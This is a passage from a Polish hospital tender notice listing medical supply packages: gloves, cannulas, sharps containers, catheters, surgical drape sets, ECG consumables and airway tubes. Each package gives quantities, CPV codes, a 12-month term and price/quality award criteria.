25.	Kaniula dożylna 20G (1,0x35mm)			Szt				5000	
26.	Kaniula dożylna 22G     (0,8x25 mm)			Szt.				50	
27	Strzykawki doustne do podawania leków doustnie dla noworodków i dzieci o pojemności 10 ml.			Szt				1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9, 33.14.13.10-6, 33.14.12.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1.	Rękawice diagnostyczne, lateksowe bezpudrowe z wewnętrzną warstwą polimerową, AQL 1,5, poziom protein nie więcej niż 150ug/g, mikroteksturowane, zgodność z normą EN 455 potwierdzona przez jednostkę notyfikowaną, badania na przenikalność substancji chemicznych zgodnie z EN 374-3; rozmiary: S, M, L			Opakowanie po 100 sztuk				1000	7755,00
2.	Rękawice diagnostyczne, winylowe, pudrowane AQL 1,5,  gładkie,  zgodność z normą EN 455 potwierdzona przez jednostkę notyfikowaną, badania na przenikalność substancji chemicznych zgodnie z EN 374-3; rozmiary: S, M, L			Opakowanie po 100 sztuk				2000	7755,00
3.	Rękawice diagnostyczne, nitrylowe, teksturowane z widoczną, wyczuwalną teksturą na końcach palców. Podwójnie oznakowane . Zgodne z normą PN-EN 455-1,2,3 i EN 420. Posiadające badania na przenikalność substancji chemicznych zgodnie z EN 374-3 dla co najmniej 4 podstawowych substancji chemicznych. Wymagany poziom AQL +-1,5 (oznaczenie poziomu AQL na opakowaniu). Odporne na przenikanie wirusów zgodnie z ASTMF 1671: kwasy, zasady organiczne i nieorganiczne oraz alkohole i aldehydy - raport z badań dołączony do oferty. dł. 240 mm siła zrywania minimum 6 N. Rozmiar S,M,L.			Opakowanie po 200 sztuk				1000	13950,00
4.	Rękawice diagnostyczne, lateksowe, pudrowane, AQL 1,5; poziom protein nie więcej niż 150 ug/g, mikroteksturowane z dodatkową widoczną teksturą na końcach palców, zgodność z normą EN 455 potwierdzona przez jednostkę notyfikowaną, badania na przenikalność substancji chemicznych zgodnie z EN 374-3; rozmiary: S, M, L			Opakowanie po 100 sztuk				2000	13950,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rękawice chirurgiczne, lateksowe pudrowane, AQL=1,0, zawartość protein poniżej  50 ug/g, powierzchnia zewnętrzna mikroteksturowana, mankiet równomiernie rolowany, długość rękawicy min. 285 mm,  rozmiary - 6,0; 6,5; 7,0; 7,5; 8,0; 8,5.			para				9000 par	7755,00
2	Rękawice chirurgiczne, lateksowe bezpudrowe, obustronnie chlorowane i silikonowane, z wewnętrzną warstwą poliuretanową, powierzchnia zewnętrzna teksturowana, mankiet równomiernie rolowany, długość rękawicy min. 295 mm,          AQL =1,0, zawartość protein poniżej 30 ug/g, , rozmiary - 6,0; 6,5; 7,0; 7,5; 8,0; 8,5.			para				6000 par	7755,00
3	Rękawice chirurgiczne, neoprenowe , bezpudrowe dla osób uczulonych na lateks, AQL =1,0, powierzchnia zewnętrzna mikroteksturowana, chlorowana i silikonowana, powierzchnia wewnętrzna silikonowana z warstwą poliuretanową, kolor zielony (eliminacja refleksu i odblasku), mankiet równomiernie rolowany, długość rękawicy min. 305 mm, rozmiary - 6,0; 6,5; 7,0; 7,5; 8,0; 8,5.			para				50 par	13950,00
4	Rękawice chirurgiczne do procedur ginekologicznych, lateksowe, bezpudrowe, powierzchnia zewnętrzna teksturowana, mankiet równomiernie rolowany, długość rękawicy min. 480 mm,  AQL  1,5, zawartość  protein poniżej 30 ug/g, rozmiary - 6,0; 6,5; 7,0; 7,5; 8,0; 8,5.			para				200 par
5	Rękawice chirurgiczne do procedur ortopedycznych, lateksowe, bezpudrowe, obustronnie chlorowane i silikonowane, z wewnętrzną warstwą poliuretanową, powierzchnia zewnętrzna teksturowana, kolor brązowy (eliminacja refleksu i odblasku) , mankiet równomiernie rolowany, długość rękawicy min. 295 mm, AQL  1,0, zawartość  protein poniżej 30 ug g, rozmiary - 6,0; 6,5; 7,0; 7,5; 8,0; 8,5.							500 par
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1.	Pojemnik na odpady medyczne zakaźne -  pooperacyjne, poporodowe-typu wiaderko , całkowicie zdejmowane wieczko, plastikowe, pojemność 1l, w kolorze czerwonym (pojemnik + wieczko)			Szt				600	
2.	Pojemnik na odpady medyczne ostre -  0,5l w kolorze czerwonym (pojemnik + wieczko)			Szt				3000	
3.	Pojemnik na odpady medyczne ostre -  0,5l w kolorze żółtym (pojemnik + wieczko)			szt				30	
4.	Pojemnik na odpady medyczne ostre -  0,2l w kolorze czerwonym (pojemnik + wieczko)			szt				500	
5.	Pojemnik na odpady medyczne ostre 0,7l w kolorze czerwonym (pojemnik + wieczko)			Szt				3000	
6.	Pojemnik na odpady medyczne - ostre  1,0  l w kolorze czerwonym (pojemnik + wieczko)			Szt				2000	
7.	Pojemnik na odpady medyczne - ostre  2,0  l w kolorze czerwonym (pojemnik + wieczko)			szt				500	
8.	Pojemnik na odpady medyczne - ostre  2,0  l w kolorze niebieskim (pojemnik + wieczko)			szt				1000	
9.	Pojemnik na odpady medyczne - ostre  5,0  l w kolorze czerwonym (pojemnik + wieczko l			szt				200	
10.	Pojemnik na odpady medyczne - ostre  5,0  l w kolorze niebieskim (pojemnik + wieczko l			szt				200	
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1.	Wzierniki jednorazowe w rozmiarach S,M			SZT				6000	
2.	Osłonki na głowice do USG-pakowane pojedynczo, bez zbiorniczka			Szt				5000	
3	Szkiełka cytologiczne -1/4 pole matowe a 50 szt			szt				3000	
4	Żel do USG i KTG 500g.			szt				150 	
5	Patyczki  do wymazów z wacikiem:-czyste mikrobiologicznie, dł 15-16cm			Szt				5000	
6	Szczoteczki cytologiczne			Szt				2000	
7	Szczoteczki cytologiczne kombinowane							200	
8	 Rozcinacz do zaciskacza-jednorazowego użytku , pakowane pojedynczo, ostrze nierdzewne			Szt				500	
9	Zaciskacz do pępowiny			Szt				500	
10	Okularki do fototerapii 			szt				300	
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1.	 Cewnik Foleya CH 6- 24 CH			Szt				7000	
2.	Cewnik Nelatona 			Szt				500	
3.	Cewnik Tiema nr.CH 8,10,12,14,16,18,20,22			Szt				500	
4	worek na mocz jałowy			Szt				2000.	
5.	Worek na mocz niejałowy			Szt				7500	
6.	Worek na mocz dla niemowląt			Szt				1500	
7.	Zatyczka do cewnika Foley			Szt				1000	
8.	 Worek do godzinowej zbiórki moczu 			Szt				100	
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1	Zestaw porodowy  jałowy , jednorazowego użytku .Składa się z trzech pakietów , które zawierają: :A.	2 pary sterylnych rękawiczek , 1 sterylny podkład , 1 sterylna serwetka wierzchnia , 2 sterylne ręczniki do rąk B.	4 sterylne tampony , 1 sterylna  gruszka , 2 sterylne klemy pępowinowe , 2 sterylne zapasowe zaciski 1 para sterylnych nożyczek C.	 1 sterylna wyściółka , 2 antyseptyczne rękawiczki ,1 kocyk dla noworodka , 1 pielucha  1 plastikowa torba na łożysko 			szt				20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość nettozamówienia
1.	Zestaw serwet operacyjnych, barierowych, wykonanych z chłonnego i nie przemakalnego laminatu dwu lub trójwarstowego, o gramaturze minimum 74g m2 o składzie minimalnym:a. serweta na ekran anestezjologiczny o wym.min.150x200cm. z taśmą samoprzylepnąb. serweta dolna o wym.min.170x175cm. wykończona taśmą lepnąc. serwety boczne o wym.min. 75x90cm. wykończone taśmą lepną na całej długości dłuższego bokud. pokrowiec na stolik Mayo, z dodatkową zewnętrzną warstwą chłonną, z piaskowanej folii o wym. min. 80x145cme. serweta na stolik narzędziowy o wym. min. 140x190cm.f. taśma włókninowa o wym. min. 10x50cm g. ściereczki do rąk Materiał obłożenia bezwzględnie musi spełniać wymogi normy EN 13795-1-3, a każdy zestaw musi posiadać informację o dacie ważności i nr. Serii w postaci naklejki do umieszczenia na karcie pacjenta. Materiał serwet operacyjnych musi składać się z minimum z dwóch warstw(folia polietylenowa, włóknina wiskozowa) o minimum gramaturze materiału na całej powierzchni 74g m2, min. I odporności na penetracje płynów min.200cmH2O. Produkt bezpiecznie pakowany: zawartość zestawu owinięta w specjalną serwetę i umieszczona w blisterze, zestawy do transportu pakowane w dwa kartony			kpl				.300	
2.	Zestaw serwet operacyjnych, barierowych, wykonane z chłonnego i nieprzemakalnego laminatu dwu lub trójwarstwowego, do procedur laparaskopowych , o składzie minimalnym:a.	serweta do zabiegów laparoskopii o wym. min.260x300cm, z przeźroczystą torbą na narzędzia i samoprzylepnym oknem 28x32cmb.	serweta na stolik narzędziowy o wym. min.140x190cmc.	pokrowiec na stolik Mayo, z dodatkową zewnetrzną warstwą chłonną o wym.min. 80x145cmd.	ściereczki do rak Sterylny zestaw jednooserwetowy wykonany z trójwarstwowej pełnobarierowej włókniny (zgodnej EN 13795 1,2,3) o gramaturze min. 70g m2.Wymagane jest aby jedną z warstw włókniny stanowiła folia PE. Chłonność warstwy zewnętrznej min. 78%. Obłożenie powinna cechować wysoka odporność na penetracje płynów (zgodnie z EN 20811)>cmH2O. Produkt bezpiecznie pakowany: zawartość zestawu owinięta w specjalną serwetę i umieszczona w blisterze, zestawy do transportu pakowane w dwa kartony 			kpl				20	
3.	Zestaw serwet operacyjnych do zabiegów artroskopowych Barierowych , wykonanych z chłonnej i nieprzemakalnej dwu lub trójwarstwowej włókniny wiskozowej bez dodatku celulozy ( zgodnie z normą EN 13795 1-3), o gram.min. 74g m2 , warstwa barierowa z polietylenu, odporność na penetrację płynów min. 200cm. o składzie minimalnym: a.	serweta na stolik instrumentariuszki - 1 szt. 140x 190cm. b.	serweta na stolik Mayo 80x145cm. c.	serweta nieprzylepna 150x 175cm. d.	osłona na kończynę 25x80cm.e.	serweta do obłożenia  kończyny z elastycznym  samouszczelniającym się otworem oraz uchwytem welcro do mocowania kabli i drenów 200x320cm. f.	2 taśmy samoprzylepne 10x50cm.g.	4 ręczniki do rąk :Materiał obłożenia bezwzględnie musi  spełniać wymogi normy EN 13795-1-3, a każdy zestaw musi posiadać informację o dacie ważności i nr. Serii w postaci naklejki do umieszczenia na karci pacjenta . Materiał serwet operacyjnych musi składać się z min. 2 warstw ( folia polietylenowa, włóknina wiskozowa) o min. gramaturze materiału na całej powierzchni 74g m2, min. i odporności na penetrację płynów min. 200cm. H2O . produkt bezpiecznie pakowany , zawartość zestawu owinięta w specjalną serwetę i umieszczona w blisterze , zestawy do transportu  pakowane w 2 kartony . 			kpl				60	
4	Zestaw serwet operacyjnych  Barierowych , wykonanych z chłonnego i nieprzemakalnego laminatu dwu lub trójwarstwowego do cięcia cesarskiego , o składzie min. a.	1 serweta do nakrycia stołu instrumentariuszki 150x200cm. b.	1 serweta do nakrycia stolika Mayo 80x145cm. c.	1 serweta do cięcia cesarskiego z torbą na płyny oraz oknem wypełnionym folią chirurgiczna 250x200x315cm. d.	chłonna serweta dla noworodka 87x90cm. e.	1 taśma samoprzylepna 10x50cm. f.	2 ręczniki celulozowe 33x33cm. :Materiał obłożenia bezwzględnie musi spełniać wymogi normy EN 13795-1-3, a każdy zestaw musi posiadać informację o dacie ważności i nr. serii w postaci  naklejki do umieszczenia na karcie pacjenta. Materiał musi składać się z min. 2 warstw o min. gramaturze materiału na całej powierzchni 53g m2 min. wytrzymałość  na rozerwanie w stanie mokrym (wg. normy EN 13938-1) 290kPa . Produkt bezpiecznie     pakowany: zawartość zestawu owinięta w papier krepowy i umieszczony w blister, zestwy do transportu pakowane w dwa kartony 			Kpl				40.	
5.	Zestaw  serwet operacyjnych, barierowych wykonanych z chłonnego, nieprzemakalnego laminatu dwu lub trójwarstwowego, do operacji ginekologicznych o składzie minimalnym:a.jedna serweta do nakrycia stołu instrumentariuszki 150x100cmb.jedna serweta ginekologiczna 100x200cm z samoprzylepnym oknem 7x10cmc.dwie osłony na kończynę, długie 75x120cm d.dwa ręczniki celulizowe 33x33cmMateriał obłożenia musi bezwzględnie spełniać wymogi normy EN 13795-1-3, a każdy zestaw musi posiadać informację o dacie ważności i nr. serii w postaci  naklejki do umieszczenia na karcie pacjenta. Materiał serwet operacyjnych musi składać się minimum dwóch warstw( folia polietylenowa, włóknina wiskozowa lub polipropylen) o min.gramaturze materiału na całej powierzchni  53g m2min. odporność na penetrację płynów min. 150cmH2O. Produkt bezpiecznie pakowany, zawartość zestawu owinięta w specjalną serwetę i umieszczona w blistrze. Zestwawy do transportu pakowane w dwa kartony			kpl				40	
6.	Zestaw serwet operacyjnych do zabiegów w chirurgii biodra:Barierowych, wykonanych z chłonnej i nieprzemakalnej dwu lub trójwarstwowej włókniny wiskozowej bez dodatku celulozy (zgodność z normą EN 13795 1-3) o gramaturze.min.70g m2, warstwa barierowa z polietylenu, odporność na penetrację płynów min.150cm o składzie min.a.serweta na stolik sanitariuszki-1szt 140x190cmb.serweta na stolik Mayo 80x140cm c.serweta nieprzylepna 75x90cmd.serweta na biodro 150x200cme.osłona na kończynę 35x120cmf.serweta samoprzylepna górna 170x300cmg.serweta z wycięciem U 200x260cm, wycięcie 6,5x95cmh.dwie taśmy samoprzylepne 10x50cmMateriał obłożenie  musi bezwzględnie spełniać wymogi normy EN 13795-1-3, a każdy zestaw musi posiadać informację o dacie ważności i nr. serii w postaci  naklejki do umieszczenia na karcie pacjenta. Materiał serwet operacyjnych musi składać się z minimum dwóch warstw( folia polietylenowa, włóknina wiskozowa ) o min.gramaturze materiału na całej powierzchni  74g m2min. odporność na penetrację płynów min. 200cmH2O. Produkt bezpiecznie pakowany, zawartość zestawu owinięta w specjalną serwetę i umieszczona w blistrze. Zestwawy do transportu pakowane w dwa kartony			kpl				20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość nettozamówienia
1	Pokrowiec jałowy na nogi pacjenta , rozmiar 65-75x120cm.-100op.x2			Szt				150	
2	Serweta włókninowa foliowana wiskozowo-polietylenowa o gramaturze 77g/m2. Rozmiar 180x150cm. Z przylepcem:Bez przylepca: 			Szt				300200.	
3	Serweta na stolik MAYO - jałowa. Rozmiar 145x80cm.			Szt				1200	
4	Fartuch operacyjny wzmocniony, sterylny. Rozmiar :XXLXL			szt				1500.1500t.	
5	Fartuch zabiegowy sterylny Rozmiar:XXLXL			Szt				15001500	
6	Serweta z włókniny foliowanej o gramaturze 77g m2 z przylepcem na krótszym boku , jałowa , trójwarstwowa , rozmiar 90x75cm.			Szt				700	
7	Serweta włókninowa o gramaturze 35g m2, jałowa, zielona rozmiar 160x250cm			Szt				500	
8	Serweta włókninowa, foliowana trójwarstwowa o gramaturze 77g m2 rozmiar 45x75cm z otworem o śr 8cm z przylepcem, jałowa			Szt				500.	
9	Osłona z folii do zabezpieczenia kabli wideo i optyk endoskopowych rozmiar 15x250cm			Szt				200	
10	Fartuch zabiegowy nie jałowy z włókniny o gramaturze 20g m2			Szt				300	
11	Folia chirurgiczna w rozmiarach:15x20cm.-10 op.			Szt				10	
12	Folia chirurgiczna  w rozmiarach:30x20cm.-10op.			Szt				10	
 13.	Folia chirurgiczna w rozmiarach -40x35cm-5op.			Szt				5	
14	Zestaw serwte operacyjnych wykonanych z włókniny 3 warstwowej do wykorzystania jako obłożenie pola operacyjnego do operacji tarczycy-serweta 240x180cm z wycięciem,,U 60-65x6,5-7cm z przylepcem  1szt.-serweta 200x180cm z przylepcem-1szt.-serweta na stolik Mayo 145x80-85cm-1szt.-serweta na stolik instumentariuszki-180cmx140cm-1szt.-ściereczki do rąk bardzo chłonne o rozmiarach 40x50cm-4szt.Serwety powinny być wykonane z włókniny laminowanej trójwarstwowej o gramaturze minimum 70g m2, spełniające wymogi ustawy o wyrobach medycznych z dnia 20.04.2004r.-PNEN 13795(1-3)-PNEN ISO 13485-PNEN 980czystość pod względem cząsteczek stałych obłożenia nie więcej niż 2,5 IPM .Odporność na penetrację płynów minimum 180cm.H2O. Odporność na przenikanie drobnoustrojów na mokro w swerze krytycznej=6Ibpierwsza klasa palności, poszczególne serwety obłożenia powinny posiadać oznaczenia kierunku rozkładania(system strzałek) oraz miejscem przeznaczenia na polu operacyjnym(system np.głowa, stopa).Zestaw serwetek powinien być zapakowany w podwójnym opakowaniu. Zewnętrzne opakowanie to torba papierowo-foliowa. Na opakowaniu muszą znajdować się etykiety typu TAG z informacjami: indeks wyrobu, LOT, data ważności, identyfikacja wytwórcy służąca do dokumentacji medycznej pacjenta.								
15	Serwety włókninowe-rozmiar., 45x45cm  jałowe składane, gramatura 43g m2			 szt				2000	
16	Serweta do osuszania rąk 80x60 cm,  mikrobiologicznie czysta			szt				2000	
17	Serweta z włókniny, o wym. 80 x 50 cm			szt				1000	
18	Serweta włókninowa o wym. 65 x65 cm i z otworem 8cm x 3 cm + przylepiec							300	
19	Podkład ginekologiczny - 9x34 cm, pakowany			szt				300	
20	Podkład złożony ochronny, bibułowo-foliowy, perforowany co 80 cm			szt				200	
21	Serweta z włókniny 160x210 niejałowa, zielona			Szt				2000	
22	Serweta do osuszania rąk 80x60 cm, jałowa			Szt				1000	
23	Serweta do osuszania rąk 80x60 cm, niejałowa			Szt				300	
24	Serweta do osuszania rąk 40x50 cm, jałowa			Szt				300	
26	Ubranie operacyjne, niejałowe, męskie z włókniny			Szt				300	
26	Fartuch wizytacyjny, jednorazowy			Szt				500	
27	Maska jednorazowego użytku (operacyjna-chirurgiczna) JAŁOWA,- trójwarstwowa			Szt				5000	
28	Maska jednorazowego użytku (operacyjna - chirurgiczna) niejałowa - trójwarstwowa			Szt				1000	
29	Czapka chirurgiczna jednorazowa z fiseliny, niesterylna, męska			Szt				3000	
30	Czapka chirurgiczna jednorazowa z fiseliny, niesterylna, damska			szt				3000	
31	Obuwie jednorazowe z włókniny z gumką			szt				1000	
32	Fartuch operacyjny przedni z włókniny zielonej niejałowy rozmiar 87x120cm.			Szt.				1000	
33	Zestaw do zmiany opatrunku  			szt				100	
34	Zestaw do cewnikowania			szt				50	
35	Serweta dwuwarstwowa pod pośladki z workiem na płyny, z taśmą do modelowania otworu. Jałowa. Szerokość części pośladkowej 38 cm			szt				400	
36	Jalowy zestaw dla noworodka			szt				350	
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1.	Papier do KTGodpowiedni do aparatu KTG Sonicaid Oxford Team							70	
2.	Papier do KTGodpowiedni do aparatu BIONET FC 700							50	
3.	Papier do EKGodpowiedni do aparatu  EKG ASPEL MR BLUE i  B 56,  112x25							30	
5.	Papier do EKGodpowiedni do aparatu EKG ASCARD 3, 104x40 z nadrukiem							60	
6.	Pasta do przygotowania naskórka do przyklejania elektrod							20	
7.	Elektrody do EKG 							3000	
8.	Elektroda do Holtera  RLLL-510, rozm. 56 x 42 mm.							1500	
9.	Pokrowce na aparat Holtera, jednorazowy, wykonany z włókniny z mocnym paskiem							30	
10.	Żel do EKG 250g.							300	
11	Pasy do KTG jednokrotnego użytku z możliwością regulowania długości zapięcia								
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> pAKIET 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość brutto
1.	Aparaty do przygotowywania i pobierania leków ,z zastawką otwierającą drogę dla płynu tylko w momencie przyłączenia strzykawki z filtrem  przeciwbakteryjnym 045um			Szt				3000.	
2.	Bezigłowy port dostępu z łącznikiem luer-lock typu męskiego, do wielokrotnego wlewu leków i wlewów, pakowane pojedynczo, sterylne			Szt				1000	
3.	Bezigłowy port dostępu z łącznikiem luer-lock typu męskiego, do wielokrotnego wlewu leków i wlewów, z przedłużaczem o małej średnic, pakowane pojedynczo ,sterylne			Szt				500	
4.	Bezigłowy  port dostępu z łącznikiem luer-lock typu męskiego, do wielokrotnego wlewu leków i wlewów, z podwójnym przedłużaczem o małej średnicy ,pakowane pojedynczo ,sterylne			Szt				500	
5.	Koreczek do strzykawek typu Combi, z końcówką męską i żeńską			Szt				1000	
6.	Kranik trójdrożny 			Szt				4000	
7.	Koreczki do wenflonów -typ luer-lock,			Szt				5000	
8.	 Zestaw do pomiaru ośrodkowego ciśnienia żylnego. Aparat do przetaczania płynów infuzyjnych z odpowietrznikiem, posiadające twardą górną część komory kroplowej oraz elastyczną dolną część w celu łatwego ustalenia poziomu płynów. Zacisk rolkowy z miejscem na kolec komory kroplowej dla bezpieczeństwa po użyciu: kranik trójdrożny i dren do skali 			SZT				100	
9.	Skala wielorazowego użytku z wskazówką punktu zerowego oraz klamrami mocującymi			SZT				20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1.	 Cewnik do odsysania w systemie zamkniętym minimum 48h rozmiar 14F			Szt				100.	
2.	Cewnik do odsysania w systemie zamkniętym minimum 48h rozmiar 16F			Szt				100.	
3	 Wielokomorowy drenaż do opłucnej z wodną regulacją siły ssania z komorą kolekcyjną min. 2200ml			Szt				20	
4	Wielokomorowy ,,suchy,, drenaż do opłucnej nie wymagający wypełniania żadnej komory wodą 			Szt				20	
5	Dren z trokarem tępym różne rozmiary 			Szt				50	
6	Dren z trokarem ostrym różne rozmiary 			Szt				50	
7	 Rurka tracheostomijna z mankietem niskociśnieniowym o potwierdzonej klinicznie obniżonej przenikalności dla podtlenku azotu lub systemem automatycznie regulującym ciśnienie w mankiecie typu Lanz, z odsysaniem z nad mankietu,  z wewnętrznym mandrynem różne rozmiary			Szt				100	
8	Rurka intubacyjna z mankietem niskociśnieniowym o potwierdzonej klinicznie obniżonej przenikalności dla podtlenku azotu lub systemem automatycznie regulującym ciśnienie wewnątrz mankietu z odsysaniem z nad mankietu ,sterylna, z automatycznym otworem Murphy ego. Różne rozmiary			Szt				200	
9	Rurka intubacyjna z mankietem niskociśnieniowym o potwierdzonej klinicznie obniżonej przenikalności dla gazów anestetycznych lub z systemem automatycznie regulującym ciśnienie wewnątrz mankietu typu Lanz, opakowanie folia-papier o profilu ułatwiającym zachowanie kształtu rurki, różne rozmiary			Szt				2000	
